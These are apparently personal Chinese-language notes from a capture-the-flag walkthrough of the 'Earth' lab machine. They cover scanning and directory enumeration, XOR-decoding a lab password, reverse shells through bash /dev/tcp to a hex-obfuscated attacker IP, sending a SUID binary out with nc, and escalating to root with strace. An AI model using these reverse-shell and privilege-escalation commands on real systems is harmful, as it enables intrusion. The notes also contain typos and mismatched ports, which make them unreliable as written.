渗透Earth bajiceshi

192.168.113.129  靶机

192.168.113.128 卡里

sudo passwd root
su root   

nmap 192.168.113.0/24

nmap -A 192.168.113.128

vim /etc/hosts

dirb https://earth.local  

dirb https://terratest.earth.local 

192.168.230.131/24       ip
192.168.230.134            靶机

earth.local terratest.earth.local
terra earthclimatechangebad4humans

bash -i >& /dev/tcp/0xC0.0xA8.0xE6.0x83/1234 0>&1         第一次反弹
nc -lvvp 1234

nc 192.168.43.118 1234 < /usr/bin/reset_root                       第二次反弹
nc -nlvp 1234 >reset_root

find / -perm -u=s -type f 2>/dev/null

破译密码       用户名：terra       earthclimatechangebad4humans
wget https://terratest.earth.local/testdata.txt --no-check-certificate     安装。。
vim xor.py            新建文件

import binascii
key1="2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
testdata = binascii.b2a_hex(decode_txt).decode()
print(hex(int(key1,16) ^ int(testdata,16)))

python xor.py         运行
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174L

https://www.toolscat.com/decode/hex        十六进制转换为字符

nc -nvlp 1111 

bash -i >& /dev/tcp/0xC0A87180/1111 0>&1

find / -perm -u=s -type f 2>/dev/null  查看root特殊错误文件   都行   find / -perm -4000 2>/dev/null   查看三个文件

nc 0xC0A87180 7711 < /usr/bin/reset_root   监听kali

nc -lvvp 7777>reset_root   监听

apt-get install strace    下载
 
sudo ape-get install strace 

chmod 777 reset_root  提权

strace ./reset_root   查看缺失文件

添加缺失文件：

touch /dev/shm/kHgTFI5G

touch /dev/shm/Zw7bV9U5

touch /tmp/kcM0Wewe

  /usr/bin/reset_root 拿到root密码

su rot

ls /root

cat root/root_flag.txt